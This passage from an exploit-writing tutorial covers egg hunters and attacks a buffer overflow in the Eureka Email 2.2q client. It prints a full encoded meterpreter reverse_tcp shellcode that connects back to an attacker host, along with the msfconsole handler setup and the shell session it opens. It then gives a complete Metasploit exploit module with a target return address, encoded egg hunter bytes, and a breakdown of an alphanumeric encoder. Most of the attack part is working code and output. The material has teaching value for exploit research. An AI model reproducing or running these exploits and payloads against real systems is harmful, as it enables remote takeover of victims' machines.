)<\/p>\n<p>- a visual representation will be given, indicating \u201c--\u201c when bytes don\u2019t match :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image34.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb34.png\" alt=\"image\" width=\"459\" height=\"645\" border=\"0\" \/><\/a><\/p>\n<p>So if one of the instances in memory seems to be corrupted, you can try to re-encode the shellcode to filter out bad chars\u2026 but if there is one instance that is not broken, you can try to figure out a way to get the egg hunter to start at a location that would trigger the hunter to find the unmodified version of the shellcode first \ud83d\ude42<\/p>\n<blockquote><p>Note : you can compare bytes in memory (at a specific location) with bytes from a file by adding the memory address to the command line :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image101.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image10_thumb.png\" alt=\"image\" width=\"369\" height=\"27\" border=\"0\" \/><\/a><\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>See if the egg hunter still works with larger shellcode (which is one of the goals behind using egg hunters)<\/h3>\n<p>Let\u2019s try again with larger shellcode.\u00a0 We\u2019ll try to spawn a meterpreter session over tcp (reverse connect to attacker) in the same Eureka Email exploit.<\/p>\n<p>Generate the shellcode. My attacker machine is at 192.168.0.122. The default port is 4444. 
We\u2019ll use alpha_mixed as encoder,\u00a0 so the command would be :<\/p>\n<p>.\/msfpayload windows\/meterpreter\/reverse_tcp LHOST=192.168.0.122 R | .\/msfencode -b '0x00' -t perl -e x86\/alpha_mixed<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">.\/msfpayload windows\/meterpreter\/reverse_tcp LHOST=192.168.0.122 R | .\/msfencode -b '0x00' -t perl -e x86\/alpha_mixed\n[*] x86\/alpha_mixed succeeded with size 644 (iteration=1)\n\n<span style=\"color: #0000ff;\">my<\/span> $buf =\n\"<span style=\"color: #8b0000;\">\\x89\\xe5\\xd9\\xe5\\xd9\\x75\\xf4\\x5e\\x56\\x59\\x49\\x49\\x49\\x49<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x49\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x42\\x75\\x4a\\x49\\x49\\x6c\\x4b\\x58\\x4e\\x69\\x45\\x50\\x45\\x50<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x45\\x50\\x43\\x50\\x4c\\x49\\x4b\\x55\\x46\\x51\\x49\\x42\\x50\\x64<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4e\\x6b\\x42\\x72\\x44\\x70\\x4c\\x4b\\x46\\x32\\x46\\x6c\\x4e\\x6b<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x43\\x62\\x45\\x44\\x4e\\x6b\\x44\\x32\\x51\\x38\\x46\\x6f\\x4c\\x77<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x50\\x4a\\x45\\x76\\x45\\x61\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4e\\x4c<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x47\\x4c\\x43\\x51\\x43\\x4c\\x46\\x62\\x44\\x6c\\x51\\x30\\x4f\\x31<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4a\\x6f\\x44\\x4d\\x43\\x31\\x4f\\x37\\x4d\\x32\\x4c\\x30\\x50\\x52<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x42\\x77\\x4e\\x6b\\x50\\x52\\x44\\x50\\x4e\\x6b\\x50\\x42\\x47\\x4c<\/span>\" 
.\n\"<span style=\"color: #8b0000;\">\\x43\\x31\\x4a\\x70\\x4e\\x6b\\x43\\x70\\x43\\x48\\x4b\\x35\\x49\\x50<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x43\\x44\\x43\\x7a\\x45\\x51\\x48\\x50\\x46\\x30\\x4e\\x6b\\x43\\x78<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x45\\x48\\x4c\\x4b\\x50\\x58\\x45\\x70\\x47\\x71\\x49\\x43\\x4a\\x43<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x47\\x4c\\x42\\x69\\x4c\\x4b\\x44\\x74\\x4e\\x6b\\x47\\x71\\x49\\x46<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x50\\x31\\x49\\x6f\\x50\\x31\\x4b\\x70\\x4e\\x4c\\x4b\\x71\\x4a\\x6f<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x44\\x4d\\x47\\x71\\x4b\\x77\\x45\\x68\\x4b\\x50\\x43\\x45\\x4a\\x54<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x47\\x73\\x43\\x4d\\x49\\x68\\x45\\x6b\\x43\\x4d\\x51\\x34\\x44\\x35<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4d\\x32\\x51\\x48\\x4c\\x4b\\x42\\x78\\x51\\x34\\x47\\x71\\x4b\\x63<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x43\\x56\\x4e\\x6b\\x46\\x6c\\x50\\x4b\\x4c\\x4b\\x43\\x68\\x47\\x6c<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x45\\x51\\x4e\\x33\\x4e\\x6b\\x45\\x54\\x4e\\x6b\\x46\\x61\\x4a\\x70<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4c\\x49\\x50\\x44\\x51\\x34\\x45\\x74\\x51\\x4b\\x43\\x6b\\x51\\x71<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x51\\x49\\x50\\x5a\\x42\\x71\\x49\\x6f\\x4d\\x30\\x51\\x48\\x43\\x6f<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x51\\x4a\\x4c\\x4b\\x44\\x52\\x4a\\x4b\\x4d\\x56\\x51\\x4d\\x51\\x78<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x46\\x53\\x46\\x52\\x45\\x50\\x47\\x70\\x50\\x68\\x42\\x57\\x50\\x73<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x50\\x32\\x51\\x4f\\x50\\x54\\x51\\x78\\x42\\x6c\\x44\\x37\\x46\\x46<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x43\\x37\\x49\\x6f\\x4e\\x35\\x4c\\x78\\x4c\\x50\\x46\\x61\\x43\\x30<\/span>\" .\n\"<span style=\"color: 
#8b0000;\">\\x45\\x50\\x46\\x49\\x4a\\x64\\x51\\x44\\x50\\x50\\x43\\x58\\x44\\x69<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4f\\x70\\x42\\x4b\\x45\\x50\\x4b\\x4f\\x48\\x55\\x50\\x50\\x46\\x30<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x42\\x70\\x50\\x50\\x47\\x30\\x50\\x50\\x43\\x70\\x46\\x30\\x45\\x38<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x48\\x6a\\x46\\x6f\\x49\\x4f\\x49\\x70\\x4b\\x4f\\x4e\\x35\\x4f\\x67<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x42\\x4a\\x47\\x75\\x51\\x78\\x4f\\x30\\x4f\\x58\\x43\\x30\\x42\\x5a<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x50\\x68\\x46\\x62\\x43\\x30\\x42\\x31\\x43\\x6c\\x4c\\x49\\x4d\\x36<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x50\\x6a\\x42\\x30\\x46\\x36\\x46\\x37\\x42\\x48\\x4d\\x49\\x4e\\x45<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x42\\x54\\x51\\x71\\x49\\x6f\\x4e\\x35\\x4d\\x55\\x49\\x50\\x44\\x34<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x44\\x4c\\x49\\x6f\\x50\\x4e\\x44\\x48\\x50\\x75\\x4a\\x4c\\x43\\x58<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x49\\x6f\\x4a\\x75\\x43\\x5a<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x45\\x50\\x51\\x7a\\x43\\x34\\x42\\x76\\x50\\x57\\x51\\x78\\x45\\x52<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x69\\x4b\\x78\\x43\\x6f\\x49\\x6f\\x48\\x55\\x4e\\x6b\\x46\\x56<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x51\\x7a\\x51\\x50\\x43\\x58\\x45\\x50\\x46\\x70\\x45\\x50\\x45\\x50<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x51\\x46\\x42\\x4a\\x45\\x50\\x50\\x68\\x51\\x48\\x4f\\x54\\x46\\x33<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4d\\x35\\x4b\\x4f\\x4b\\x65\\x4e\\x73\\x46\\x33\\x42\\x4a\\x43\\x30<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x50\\x56\\x43\\x63\\x50\\x57\\x42\\x48\\x44\\x42\\x48\\x59\\x49\\x58<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x51\\x4f\\x49\\x6f\\x4b\\x65\\x43\\x31\\x49\\x53\\x46\\x49\\x4b\\x76<\/span>\" .\n\"<span 
style=\"color: #8b0000;\">\\x4d\\x55\\x4b\\x46\\x51\\x65\\x48\\x6c\\x49\\x53\\x47\\x7a\\x41\\x41<\/span>\";<\/pre>\n<p>In the exploit script, replace the calc.exe shellcode with the one generated above.<\/p>\n<p>Before running the exploit, set up the meterpreter listener :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><strong><span style=\"color: #ff0000;\">.\/msfconsole<\/span><\/strong> \n\n ____________\n&lt; metasploit &gt;\n ------------\n       \\   ,__,\n        \\  (oo)____\n           (__)    )\\\n              ||--|| *\n\n       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]\n+ -- --=[ 490 exploits - 227 auxiliary\n+ -- --=[ 192 payloads - 23 encoders - 8 nops\n       =[ svn r8091 updated today (2010.01.09)\n\nmsf &gt; <strong><span style=\"color: #ff0000;\"><span style=\"color: #0000ff;\">use<\/span> exploit\/multi\/handler<\/span><\/strong>\nmsf exploit(handler) &gt; <strong><span style=\"color: #ff0000;\">set PAYLOAD windows\/meterpreter\/reverse_tcp<\/span><\/strong>\nPAYLOAD =&gt; windows\/meterpreter\/reverse_tcp\nmsf exploit(handler) &gt; <strong><span style=\"color: #ff0000;\">set LPORT 4444<\/span><\/strong>\nLPORT =&gt; 4444\nmsf exploit(handler) &gt; <strong><span style=\"color: #ff0000;\">set LHOST 192.168.0.122<\/span><\/strong>\nLHOST =&gt; 192.168.0.122\nmsf exploit(handler) &gt; <strong><span style=\"color: #ff0000;\">show options<\/span><\/strong>           \n\n<span style=\"color: #0000ff;\">Module<\/span> options:\n\n   Name  Current Setting  Required  Description\n   ----  ---------------  --------  -----------\n\nPayload options (windows\/meterpreter\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  process          yes       Exit technique: seh, thread, process\n   LHOST     192.168.0.122    yes       The <span style=\"color: #0000ff;\">local<\/span> address\n   
LPORT     4444             yes       The <span style=\"color: #0000ff;\">local<\/span> port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Wildcard Target\n\nmsf exploit(handler) &gt; <strong><span style=\"color: #ff0000;\">exploit<\/span><\/strong>\n\n[*] Starting the payload handler...\n[*] Started <span style=\"color: #0000ff;\">reverse<\/span> handler on port 4444<\/pre>\n<p>Now run the exploit and trigger the overflow with Eureka. After a few seconds, you should see this :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">[*] Sending stage (723456 bytes)\n[*] Meterpreter session 1 opened (192.168.0.122:4444 -&gt; 192.168.0.193:15577)\n\nmeterpreter &gt;<\/pre>\n<p>owned !<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>Implementing egg hunters in Metasploit<\/h3>\n<p>Let\u2019s convert our Eureka Mail Client egghunter exploit to a metasploit module.\u00a0 You can find some information on how exploit modules can be ported on the Metasploit wiki : <a title=\"http:\/\/www.metasploit.com\/redmine\/projects\/framework\/wiki\/PortingExploits\" href=\"https:\/\/web.archive.org\/web\/20110309172517\/http:\/\/www.metasploit.com:80\/redmine\/projects\/framework\/wiki\/PortingExploits\">http:\/\/www.metasploit.com\/redmine\/projects\/framework\/wiki\/PortingExploits<\/a><\/p>\n<p>Some facts before we begin :<\/p>\n<p>- we will need to set up a server (POP3, listener on port 110)<\/p>\n<p>- we will need to calculate the correct offset. We\u2019ll use the SRVHOST parameter for this<\/p>\n<p>- we\u2019ll assume that the client is using XP SP3 (you can add more if you can get hold of the correct trampoline addresses for other Service Packs)<\/p>\n<p>Note : the original metasploit module for this vulnerability is already part of Metasploit (see the exploits\/windows\/misc folder, and look for eureka_mail_err.rb). 
We\u2019ll just make our own module.<\/p>\n<p>Our custom metasploit module could look something like this :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 693px; height: 1202px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">class<\/span> Metasploit3 &lt; Msf::Exploit::Remote\n   Rank = NormalRanking\n   include Msf::Exploit::Remote::TcpServer\n   include Msf::Exploit::Egghunter\n   <span style=\"color: #0000ff;\">def<\/span> initialize(info = {})\n      <span style=\"color: #0000ff;\">super<\/span>(update_info(info,\n       'Name'           =&gt; 'Eureka Email 2.2q ERR Remote Buffer Overflow Exploit',\n       'Description'    =&gt; %q{\n           This <span style=\"color: #0000ff;\">module<\/span> exploits a buffer overflow <span style=\"color: #0000ff;\">in<\/span> the Eureka Email 2.2q\n           client that is triggered through an excessively long ERR message.\n           },\n       'Author'         =&gt;\n           [\n             'Peter Van Eeckhoutte (a.k.a corelanc0d3r)'\n           ],\n        'DefaultOptions' =&gt;\n            {\n             'EXITFUNC' =&gt; 'process',\n            },\n        'Payload'        =&gt;\n            {\n             'BadChars' =&gt; \"<span style=\"color: #8b0000;\">\\x00\\x0a\\x0d\\x20<\/span>\",\n             'StackAdjustment' =&gt; -3500,\n             'DisableNops' =&gt; <span style=\"color: #0000ff;\">true<\/span>,\n            },\n         'Platform'       =&gt; 'win',\n         'Targets'        =&gt;\n            [\n             [ 'Win XP SP3 English', { 'Ret' =&gt; 0x7E47BCAF } ], <span style=\"color: #008000;\"># jmp esp \/ user32.dll<\/span>\n             ],\n         'Privileged'     =&gt; <span style=\"color: #0000ff;\">false<\/span>,\n         'DefaultTarget'  =&gt; 0))\n\n          register_options(\n          [\n           OptPort.new('SRVPORT', [ <span style=\"color: #0000ff;\">true<\/span>, \"<span style=\"color: #8b0000;\">The POP3 
daemon port to listen on<\/span>\", 110 ]),\n          ], <span style=\"color: #0000ff;\">self<\/span>.<span style=\"color: #0000ff;\">class<\/span>)\n        <span style=\"color: #0000ff;\">end<\/span>\n\n        <span style=\"color: #0000ff;\">def<\/span> on_client_connect(client)\n           <span style=\"color: #0000ff;\">return<\/span> <span style=\"color: #0000ff;\">if<\/span> ((<span style=\"color: #00008b;\">p<\/span> = regenerate_payload(client)) == <span style=\"color: #0000ff;\">nil<\/span>)\n\n           <span style=\"color: #008000;\"># the offset to eip depends on the local ip address string length...<\/span>\n           offsettoeip=723-datastore['SRVHOST'].length\n           <span style=\"color: #008000;\"># create the egg hunter<\/span>\n           hunter = generate_egghunter\n           <span style=\"color: #008000;\"># egg<\/span>\n           egg = hunter[1]\n           buffer =  \"<span style=\"color: #8b0000;\">-ERR <\/span>\"\n           buffer &lt;&lt; make_nops(offsettoeip)\n           buffer &lt;&lt; [target.ret].pack('V')\n           buffer &lt;&lt; hunter[0]\n           buffer &lt;&lt; make_nops(1000)\n           buffer &lt;&lt; egg + egg\n           buffer &lt;&lt; payload.encoded + \"<span style=\"color: #8b0000;\">\\r\\n<\/span>\"\n\n           print_status(\"<span style=\"color: #8b0000;\"> [*] Sending exploit to #{client.peerhost}...<\/span>\")\n           print_status(\"<span style=\"color: #8b0000;\"> Offset to EIP : #{offsettoeip}<\/span>\")\n           client.put(buffer)\n           client.put(buffer)\n           client.put(buffer)\n           client.put(buffer)\n           client.put(buffer)\n           client.put(buffer)\n\n           handler\n           service.close_client(client)\n        <span style=\"color: #0000ff;\">end<\/span>\n\n<span style=\"color: #0000ff;\">end<\/span><\/pre>\n<p>Of course, if you want to use your own custom egg hunter (instead of using the one built into Metasploit - which uses the 
NtDisplayString\/NtAccessCheckAndAuditAlarm technique to search memory by the way), then you can also write the entire byte code manually in the exploit.<\/p>\n<p>Exploit : (192.168.0.193 = client running Eureka, configured to connect to 192.168.0.122 as POP3 server.\u00a0\u00a0\u00a0 192.168.0.122 = metasploit machine)<\/p>\n<p>I have placed the metasploit module under exploit\/windows\/eureka (new folder)<\/p>\n<p>Test :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><span style=\"color: #008000;\"># # ###### ##### ## #### ##### # #### # ##### <\/span>\n<span style=\"color: #008000;\">## ## # # # # # # # # # # # # <\/span>\n<span style=\"color: #008000;\"># ## # ##### # # # #### # # # # # # # <\/span>\n<span style=\"color: #008000;\"># # # # ###### # ##### # # # # # <\/span>\n<span style=\"color: #008000;\"># # # # # # # # # # # # # # <\/span>\n<span style=\"color: #008000;\"># # ###### # # # #### # ###### #### # # <\/span>\n       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]\n+ -- --=[ 493 exploits - 232 auxiliary\n+ -- --=[ 192 payloads - 23 encoders - 8 nops\n       =[ svn r8137 updated today (2010.01.15)\nmsf &gt; <strong><span style=\"color: #ff0000;\">use exploit\/windows\/eureka\/corelan_eureka2<\/span><\/strong>\nmsf exploit(corelan_eureka2) &gt; <strong><span style=\"color: #ff0000;\">set payload windows\/<span style=\"color: #00008b;\">exec<\/span><\/span><\/strong>\npayload =&gt; <strong><span style=\"color: #ff0000;\">windows\/<span style=\"color: #00008b;\">exec<\/span><\/span><\/strong>\nmsf exploit(corelan_eureka2) &gt;<strong><span style=\"color: #ff0000;\"> set SRVHOST 192.168.0.122<\/span><\/strong>\nSRVHOST =&gt; 192.168.0.122\nmsf exploit(corelan_eureka2) &gt; <strong><span style=\"color: #ff0000;\">set CMD calc<\/span><\/strong>\nCMD =&gt; calc\nmsf exploit(corelan_eureka2) &gt; <strong><span style=\"color: #ff0000;\">exploit<\/span><\/strong>\n[*] 
Exploit running as background job.\nmsf exploit(corelan_eureka2) &gt;\n[*] Server started.\n[*]  [*] Sending exploit to 192.168.0.193...\n[*]      Offset to EIP : 710\n[*] Server stopped.<\/pre>\n<p>Connect the Eureka Mail client to 192.168.0.122 :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image28.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb28.png\" alt=\"image\" width=\"172\" height=\"111\" border=\"0\" \/><\/a><\/p>\n<p>Other payloads :<\/p>\n<p>bindshell on port 55555 :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image29.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb29.png\" alt=\"image\" width=\"459\" height=\"178\" border=\"0\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>Badchars + Encoding<\/h3>\n<h4>Using Metasploit<\/h4>\n<p>Egghunter code is just like regular shellcode. It is susceptible to corruption in memory, it may be subject to bad chars, etc.\u00a0 So if you are getting weird errors during egghunter execution, it may be a good idea to compare the original code with what you have in memory and search for bad chars. 
(I have explained a technique to compare code (whether it\u2019s the egg hunter itself or shellcode - same technique applies) earlier in this document).<\/p>\n<p>What if you have discovered that the code was corrupted ?<\/p>\n<p>Alternative encoding may be required to make the egg hunter work, and\/or a \u201cbad char\u201d filter may be required to filter out characters that get corrupted or converted in memory and would break the code.<\/p>\n<p>Also, keep in mind that the type of encoding &amp; badchars to filter *may* be entirely different between what is applicable to the final shellcode and what is applicable to the egg hunter. It won\u2019t happen a lot of times, but it is possible. So you may want to run the exercise on both the hunter and the shellcode.<\/p>\n<p>Encoding the egg hunter (or any shellcode) is quite simple.\u00a0 Just write the egghunter to a file, encode the file, and use the encoded byte code output as your egg hunter payload.\u00a0 Whether you\u2019ll have to include the tag before encoding or not depends on the bad chars, but in most cases you should not include it.\u00a0 After all, if the tag is different after encoding, you also need to prepend the shellcode with the modified tag\u2026\u00a0 You\u2019ll have to put the egg hunter in a debugger and see what happened to the tag.<\/p>\n<p>Example : Let\u2019s say the egg hunter needs to be alphanumerical (uppercase) encoded, and you have included the tag in the eggfile, then this will be the result :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 734px; height: 573px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">root@xxxxx:\/pentest\/exploits\/trunk<span style=\"color: #008000;\"># cat writeegghunter.pl <\/span>\n<span style=\"color: #008000;\">#!\/usr\/bin\/perl<\/span>\n<span style=\"color: #008000;\"># Write egghunter to file<\/span>\n<span style=\"color: #008000;\"># Peter Van Eeckhoutte<\/span>\n<span style=\"color: #008000;\">#<\/span>\nmy 
$eggfile = \"<span style=\"color: #8b0000;\">eggfile.bin<\/span>\";\nmy $egghunter = \"<span style=\"color: #8b0000;\">\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x77\\x30\\x30\\x74<\/span>\". <span style=\"color: #008000;\"># this is the marker\/tag: w00t<\/span>\n\"<span style=\"color: #8b0000;\">\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7<\/span>\";\n\n<span style=\"color: #00008b;\">open<\/span>(FILE,\"<span style=\"color: #8b0000;\">&gt;$eggfile<\/span>\");\n<span style=\"color: #00008b;\">print<\/span> FILE $egghunter;\nclose(FILE);\n<span style=\"color: #00008b;\">print<\/span> \"<span style=\"color: #8b0000;\">Wrote <\/span>\".length($egghunter).\"<span style=\"color: #8b0000;\"> bytes to file <\/span>\".$eggfile.\"<span style=\"color: #8b0000;\">\\n<\/span>\";\n\nroot@xxxxx:\/pentest\/exploits\/trunk<span style=\"color: #008000;\"># perl writeegghunter.pl <\/span>\nWrote 32 bytes to file eggfile.bin\n\nroot@xxxxx:\/pentest\/exploits\/trunk<span style=\"color: #008000;\"># .\/msfencode -e x86\/alpha_upper -i eggfile.bin -t perl<\/span>\n[*] x86\/alpha_upper succeeded with size 132 (iteration=1)\n\nmy $buf =\n\"<span style=\"color: #8b0000;\">\\x89\\xe0\\xda\\xc0\\xd9\\x70\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x43<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x43\\x43\\x43\\x43\\x43\\x52\\x59\\x56\\x54\\x58\\x33\\x30\\x56\\x58<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\\x42<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x43\\x56\\x4d\\x51<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x49\\x5a\\x4b\\x4f\\x44\\x4f\\x51\\x52\\x46\\x32\\x43\\x5a\\x44\\x42<\/span>\" .\n\"<span style=\"color: 
\\x50\\x58">
#8b0000;\">\\x50\\x58\\x48\\x4d\\x46\\x4e\\x47\\x4c\\x43\\x35\\x51\\x4a\\x42\\x54<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4a\\x4f\\x4e\\x58\\x42\\x57\\x46\\x50\\x46\\x50\\x44\\x34\\x4c\\x4b<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x4a\\x4e\\x4f\\x44\\x35\\x4b\\x5a\\x4e\\x4f\\x43\\x45\\x4b\\x57<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x4f\\x4d\\x37\\x41\\x41<\/span>\";<\/pre>\n<p>Look at the output in $buf : your tag must be out there, but where is it ? Has it been changed or not ? Will this encoded version work ?<\/p>\n<p>Try it. Don\u2019t be disappointed if it doesn\u2019t, and read on.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h4>Hand-crafting the encoder<\/h4>\n<p>What if there are too many constraints and Metasploit fails to encode your shellcode ?\u00a0 (egg hunter = shellcode, so this applies to all shapes and forms of shellcode in general)<\/p>\n<p>What if, for example, the list of bad chars is quite extensive, what if - on top of that - the egg hunter code should be alphanumeric only\u2026<\/p>\n<p>Well, you\u2019ll have to handcraft the encoder yourself.\u00a0 In fact, just encoding the egg hunter (including the tag) will not work out of the box. What we really need is a decoder that will reproduce the original egg hunter (including the tag) and then execute it.<\/p>\n<p>The idea behind this chapter was taken from <a href=\"http:\/\/www.exploit-db.com\/exploits\/5342\" target=\"_blank\" rel=\"noopener\">a beautiful exploit<\/a> written by muts. 
If you look at this exploit, you can see a somewhat \u201cspecial\u201d egghunter.<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">egghunter=(\n\"<span style=\"color: #8b0000;\">%JMNU%521*TX-1MUU-1KUU-5QUUP\\AA%J<\/span>\"\n\"<span style=\"color: #8b0000;\">MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5<\/span>\"\n\"<span style=\"color: #8b0000;\">21*-q!au-q!au-oGSePAA%JMNU%521*-D<\/span>\"\n\"<span style=\"color: #8b0000;\">A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1<\/span>\"\n\"<span style=\"color: #8b0000;\">z1E-oRHEPAA%JMNU%521*-3s1--331--^<\/span>\"\n\"<span style=\"color: #8b0000;\">TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA<\/span>\"\n\"<span style=\"color: #8b0000;\">A%JMNU%521*-R222-1111-nZJ2PAA%JMN<\/span>\"\n\"<span style=\"color: #8b0000;\">U%521*-1-wD-1-wD-8$GwP<\/span>\")<\/pre>\n<p>The exploit code also states : \u201cAlphanumeric egghunter shellcode + restricted chars \\x40\\x3f\\x3a\\x2f\u201d. So it looks like the exploit can only be triggered using printable ascii characters (alphanumeric) (which is not so uncommon for a web server\/web application)<\/p>\n<p>When you convert this egghunter to asm, you see this : (just the first few lines are shown)<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">25 4A4D4E55      AND EAX,554E4D4A\n25 3532312A      AND EAX,2A313235\n54               PUSH ESP\n58               POP EAX\n2D 314D5555      SUB EAX,55554D31\n2D 314B5555      SUB EAX,55554B31\n2D 35515555      SUB EAX,55555135\n50               PUSH EAX\n41               INC ECX\n41               INC ECX\n25 4A4D4E55      AND EAX,554E4D4A\n25 3532312A      AND EAX,2A313235\n2D 21555555      SUB EAX,55555521\n2D 21545555      SUB EAX,55555421\n2D 496F556D      SUB EAX,6D556F49\n50               PUSH EAX\n41               INC ECX\n41               INC ECX\n25 4A4D4E55      AND EAX,554E4D4A\n25 3532312A      AND 
EAX,2A313235\n2D 71216175      SUB EAX,75612171\n2D 71216175      SUB EAX,75612171\n2D 6F475365      SUB EAX,6553476F<\/pre>\n<p>wow - that doesn\u2019t look like the egg hunter we know, does it ?<\/p>\n<p>Let\u2019s see what it does. The first 4 instructions empty EAX (2 logical AND operations) and the pointer in ESP is put on the stack (which points to the beginning of the encoded egghunter).\u00a0 Next, this value is popped into EAX. So EAX effectively points to the beginning of the egghunter after these 4 instructions :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\">25 4A4D4E55      AND EAX,554E4D4A\n25 3532312A      AND EAX,2A313235\n54               PUSH ESP\n58               POP EAX<\/pre>\n<p>Next, the value in EAX is changed (using a series of SUB instructions). Then the new value in EAX is pushed onto the stack, and ECX is increased by 2 